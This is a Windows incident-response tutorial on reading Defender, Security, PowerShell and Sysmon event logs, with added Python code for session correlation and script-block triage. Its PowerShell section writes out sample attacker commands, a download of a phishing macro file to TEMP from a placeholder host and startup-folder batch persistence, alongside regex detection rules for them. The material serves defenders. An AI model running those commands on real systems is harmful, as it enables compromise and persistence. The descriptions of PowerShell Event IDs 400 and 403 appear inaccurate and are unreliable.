Uncover Malicious Activity with Windows Event Log Analysis
Uncovering malicious activity with Windows Event Log Analysis involves examining specific logs to identify abnormal behaviors, trace attackers' activities, and understand the scope of an incident.
Default path: C:\Windows\System32\winevt\logs
The target system logs are located at:
C:\Cases\E\Windows\System32\winevt\logs
We can see our logs using Event Viewer.
Let's open the Application.evtx log file in Event Log Explorer.
Let’s explore what can be achieved with this tool.
We can filter logs by Event ID, description text, time frame, and other criteria.
We can also use the EvtxECmd tool to parse all event logs from the target system into a single export.
Let's open the exported file using Timeline Explorer.
We can sort or filter using any of these columns.
Windows Defender, part of the built-in security suite in Windows, generates logs that provide detailed information about security-related activities on the system. These logs can be critical for detecting malicious behavior, monitoring threats, and troubleshooting security issues. Windows Defender logs events related to malware detection, scan results, real-time protection, and updates.
Event ID: 5000 (Defender Enabled), source: Microsoft-Windows-Windows-Defender
Event ID: 5001 (Defender Disabled), source: Microsoft-Windows-Windows-Defender
When a new service is installed or modified on a Windows system, it generates event logs that can provide valuable information about the service's installation, configuration, and any changes made. By analyzing these event logs, you can detect malicious activities, unauthorized service installations, or changes to legitimate services.
Event ID: 7045 (A new service was installed)
Let's open the System.evtx log file in Event Log Explorer and filter by Event ID 7045.
The Security Event Log on Windows systems records significant security-related events, including user logons, logoff activities, authentication attempts, and account management actions. Analyzing these events helps to detect potential security incidents such as unauthorized access, privilege escalation, or lateral movement within a network.
Event ID: 4624 (Successful Logon)
Let's open the Security.evtx log file in Event Log Explorer and filter by Event ID 4624.
The Security ID (SID) is a unique identifier assigned to a user, group, or computer account in Windows. It is used internally by the operating system to manage access to resources and track actions performed by specific accounts.
S-1-5-18: Local System account.
S-1-5-19: Local Service account.
S-1-5-20: Network Service account.
Logon types describe how a user accessed the system. They are crucial for identifying the nature of an authentication event.
Logon Type 2 (Interactive): Physical logon at a system (e.g., console).
Logon Type 3 (Network): Access via network (e.g., SMB, web access).
Logon Type 10 (RemoteInteractive): RDP or Terminal Services logon.
Let's filter by Account Name Sec504.
Logon ID is a unique hexadecimal identifier that correlates logon sessions across multiple event logs.
When you log in to a Windows system, it is common to see two hexadecimal Logon IDs generated: one for a low-privilege session and another for a higher-privilege session. This behavior occurs because Windows uses User Account Control (UAC) to manage privilege levels for interactive logins.
Low-Privilege Logon ID:
When you log in interactively, Windows first creates a standard user session by default, even if you are an administrator.
This session operates under a low-privilege token to reduce the risk of accidental or malicious changes to the system.
It is associated with Logon Type 2 (Interactive Logon).
High-Privilege Logon ID:
If you perform an action that requires administrative rights (e.g., running a program as an administrator), UAC creates a second session with a high-privilege token.
This session is linked to your account but is treated as a separate process requiring explicit elevation.
This elevated session will have its own Logon ID.
Logon IDs play a crucial role in forensic investigations by enabling analysts to correlate different activities and actions performed during a specific session.
Let's review the actions associated with Logon ID 0xe64e2.
Let's review the actions associated with Logon ID 0xe64b4.
We can see that a new user has been added to the Administrators group.
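To show how a Logon ID ties a session to the actions taken in it, here is an added Python example; it is not part of this page or of the tools it uses. It parses constructed Security events in Windows Event XML form, pairs the two UAC sessions through the 4624 TargetLinkedLogonId field, and attributes a 4732 event (a member was added to a security-enabled local group) back to the session through SubjectLogonId; the Logon IDs and member SID are made up.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/events/event"}

# Constructed sample records in Windows Event XML form (what Event Viewer's XML view
# or Get-WinEvent's ToXml() shows). The Logon IDs and the member SID are made up.
EVENT_XML = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/events/event"><System><EventID>4624</EventID></System>
<EventData><Data Name="TargetUserName">Sec504</Data><Data Name="TargetLogonId">0x1a2b3</Data>
<Data Name="LogonType">2</Data><Data Name="TargetLinkedLogonId">0x1a2c9</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/events/event"><System><EventID>4624</EventID></System>
<EventData><Data Name="TargetUserName">Sec504</Data><Data Name="TargetLogonId">0x1a2c9</Data>
<Data Name="LogonType">2</Data><Data Name="TargetLinkedLogonId">0x1a2b3</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/events/event"><System><EventID>4732</EventID></System>
<EventData><Data Name="SubjectLogonId">0x1a2c9</Data><Data Name="TargetUserName">Administrators</Data>
<Data Name="MemberSid">S-1-5-21-1111-2222-3333-1010</Data></EventData></Event>
</Events>"""

def parse_events(xml_text):
    """Flatten each <Event> into {"EventID": int, "<Data Name>": value, ...}."""
    records = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        rec = {"EventID": int(ev.find("e:System/e:EventID", NS).text)}
        for d in ev.findall("e:EventData/e:Data", NS):
            rec[d.get("Name")] = d.text or ""
        records.append(rec)
    return records

def build_sessions(events):
    """Map each 4624 TargetLogonId to its account, logon type and UAC-linked twin session."""
    sessions = {}
    for r in events:
        if r["EventID"] == 4624:
            sessions[r["TargetLogonId"]] = {"user": r["TargetUserName"],
                                            "logon_type": int(r["LogonType"]),
                                            "linked": r.get("TargetLinkedLogonId", "0x0")}
    return sessions

def attribute_actions(events, sessions):
    """Tie later events back to a known session through SubjectLogonId.
    Returns (EventID, Logon ID, account, target); for 4732 the target is the group name."""
    hits = []
    for r in events:
        lid = r.get("SubjectLogonId")
        if lid in sessions:
            hits.append((r["EventID"], lid, sessions[lid]["user"], r.get("TargetUserName", "")))
    return hits
```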
PowerShell provides detailed logging of its activities, which can be very useful in forensic investigations, especially when analyzing the execution of malicious scripts or tracking administrative activities. The logs capture events related to PowerShell script executions, command usage, and PowerShell module activities. These logs are particularly valuable for detecting malicious activity, lateral movement, or misuse of PowerShell for post-exploitation activities.
Event ID: 400 (Engine state is changed from none to available)
This event logs the start of a PowerShell script execution. It includes:
CommandLine: The PowerShell command or script that was run.
User: The user who initiated the command.
ScriptPath: The location of the script, if applicable.
Use Case: You can use this event to track the start of potentially malicious PowerShell scripts on the system.
Event ID: 403 (PowerShell script ended)
This event logs the completion of a PowerShell script execution. It records:
Exit Code: The exit status of the script (successful or error).
Duration: The time taken for the script to execute.
Use Case: Investigating the completion of PowerShell scripts, especially if the exit code indicates a failure or error during execution.
Two files are available. Let's load them into Event Log Explorer.
The HostApplication field in PowerShell event logs refers to the application that is running the PowerShell script or command. It helps identify which process is executing the PowerShell command. In the example below:
HostApplication: powershell.exe
This indicates that the PowerShell command is being executed from the PowerShell executable, meaning that a standard PowerShell process is running the command.
Command: {Remove-Item -path $env:TEMP\deleteme_T1551.004}
This is the PowerShell command being executed. In this case, the command is attempting to remove a file named deleteme_T1551.004 located in the TEMP directory.
Regularly monitor Event ID 4104 to detect potentially malicious commands being executed in your environment, especially from non-administrative users or unexpected processes. If a system is compromised, Event ID 4104 will show what scripts or commands were executed by the attacker, helping you trace their activity.
This command runs a PowerShell script that:
Sets the variable $url to the location of a malicious Excel file (PhishingAttachment.xlsm) hosted on GitHub.
Configures the PowerShell session to use TLS 1.2 for secure communication ([Net.ServicePointManager]::SecurityProtocol).
Uses Invoke-WebRequest to download the malicious Excel file from the URL and saves it to the system's TEMP directory with the name PhishingAttachment.xlsm.
This type of command is typically used in phishing attacks, where a malicious file is downloaded and potentially executed to compromise the system.
Here's a brief explanation of what this command does:
Copying the Batch File:
It copies the file batstartup.bat from its source path (C:\AtomicRedTeam\atomics\T1547.001\src\batstartup.bat) to two startup locations:
$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat (for the current user).
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat (for all users).
Executing the Batch File:
It uses Start-Process to run the batch file from both startup locations. This ensures that the batch file is executed every time the system starts, maintaining persistence.
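An added Python example (not from this page) that turns the 4104 monitoring advice above, and the two script blocks just described, into detection logic over the ScriptBlockText of Event ID 4104 records. The rule names, regexes and sample records are my own constructions (the URL is a placeholder), and the "two or more rules" threshold is only an illustration of suppressing single-rule noise.

```python
import re

# Detection rules over ScriptBlockText (constructed here; tune to your environment).
RULES = [
    ("download_cradle", re.compile(r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|DownloadFile|DownloadString)\b", re.I)),
    ("temp_dir_path", re.compile(r"\$env:TEMP\\", re.I)),
    ("startup_folder_persistence", re.compile(r"Start Menu\\Programs\\Start-?Up", re.I)),
    ("launches_process", re.compile(r"\bStart-Process\b", re.I)),
    ("office_macro_file", re.compile(r"\.(xlsm|docm|pptm)\b", re.I)),
]

def score_block(text):
    """Names of the rules that fire on one script block, in RULES order."""
    return [name for name, rx in RULES if rx.search(text)]

def triage_4104(records, min_hits=2):
    """records: 4104 exports as dicts with UserId (SID) and ScriptBlockText.
    Returns (UserId, hits) for blocks that trip at least min_hits rules; a single rule
    (e.g. just a TEMP path, as in a cleanup command) is too noisy to raise on its own."""
    findings = []
    for r in records:
        hits = score_block(r["ScriptBlockText"])
        if len(hits) >= min_hits:
            findings.append((r["UserId"], hits))
    return findings

# Constructed sample 4104 records; the URL is a placeholder, not a real location.
SAMPLE_4104 = [
    {"UserId": "S-1-5-21-1111-2222-3333-1001",
     "ScriptBlockText": "Get-ChildItem $env:TEMP | Measure-Object"},
    {"UserId": "S-1-5-21-1111-2222-3333-1001",
     "ScriptBlockText": "$url = 'https://example.invalid/PhishingAttachment.xlsm'; "
                        "[Net.ServicePointManager]::SecurityProtocol = 'Tls12'; "
                        "Invoke-WebRequest -Uri $url -OutFile \"$env:TEMP\\PhishingAttachment.xlsm\""},
    {"UserId": "S-1-5-21-1111-2222-3333-1001",
     "ScriptBlockText": "Copy-Item C:\\AtomicRedTeam\\atomics\\T1547.001\\src\\batstartup.bat "
                        "\"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"; "
                        "Start-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\""},
    {"UserId": "S-1-5-18", "ScriptBlockText": "Remove-Item -path $env:TEMP\\deleteme_T1551.004"},
]
```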
Detecting malicious activity in Sysmon logs involves analyzing specific event IDs and correlating patterns of suspicious behavior. Sysmon, or System Monitor, provides detailed information about system activity that can be used to detect anomalies and threats.
Event ID 1: Process Creation
Logs every process start, including command-line arguments.
Event ID 3: Network Connection
Logs TCP/UDP connections made by processes.
Event ID 7: Image Load
Detects DLL injection or unusual libraries loaded into processes.
Event ID 8: CreateRemoteThread
Tracks threads created in the address space of another process.
Event ID 11: File Creation
Monitors file creation activities.
Event ID 12 & 13: Registry Key and Value Changes
Tracks changes to the registry.
Event ID 22: DNS Query
Logs DNS requests made by processes.
Let's open the "Microsoft-Windows-Sysmon" file and filter by Event ID 1 and the keyword "mavinject."
Let's filter for Event ID 3 to analyze network connections.
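An added Python example (not the page's own) showing the pivot that the two Sysmon filters above rely on: ProcessGuid links an Event ID 1 process-creation record to the Event ID 3 connections that process made, so a keyword hit on "mavinject" can be read together with its parent and its network activity. The records, GUIDs, paths and addresses are constructed sample data.

```python
# Constructed Sysmon records carrying the EventData fields of Event ID 1 (process create)
# and Event ID 3 (network connection); the GUIDs, paths and addresses are sample data.
SYSMON = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\mavinject.exe",
     "CommandLine": "mavinject.exe 4321",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 3, "ProcessGuid": "{A1}", "DestinationIp": "10.0.0.5", "DestinationPort": 443},
    {"EventID": 3, "ProcessGuid": "{B2}", "DestinationIp": "198.51.100.23", "DestinationPort": 8443},
    {"EventID": 3, "ProcessGuid": "{C3}", "DestinationIp": "198.51.100.23", "DestinationPort": 8080},
]

def index_processes(records):
    """ProcessGuid -> Event ID 1 record; the GUID is the pivot between Sysmon event types."""
    return {r["ProcessGuid"]: r for r in records if r["EventID"] == 1}

def connections_by_process(records):
    """ProcessGuid -> list of (DestinationIp, DestinationPort) taken from Event ID 3."""
    grouped = {}
    for r in records:
        if r["EventID"] == 3:
            grouped.setdefault(r["ProcessGuid"], []).append((r["DestinationIp"], r["DestinationPort"]))
    return grouped

def orphan_connections(records):
    """Event ID 3 records whose ProcessGuid has no Event ID 1 (Sysmon started after the
    process, or the log was cleared): report them rather than silently dropping them."""
    procs = index_processes(records)
    return [r for r in records if r["EventID"] == 3 and r["ProcessGuid"] not in procs]

def find_process(records, keyword):
    """Event ID 1 records whose Image or CommandLine contains keyword (case-insensitive),
    each returned with its parent image and the connections it made."""
    kw = keyword.lower()
    conns = connections_by_process(records)
    return [
        {"image": r["Image"], "parent": r["ParentImage"],
         "connections": conns.get(r["ProcessGuid"], [])}
        for r in index_processes(records).values()
        if kw in r["Image"].lower() or kw in r["CommandLine"].lower()
    ]
```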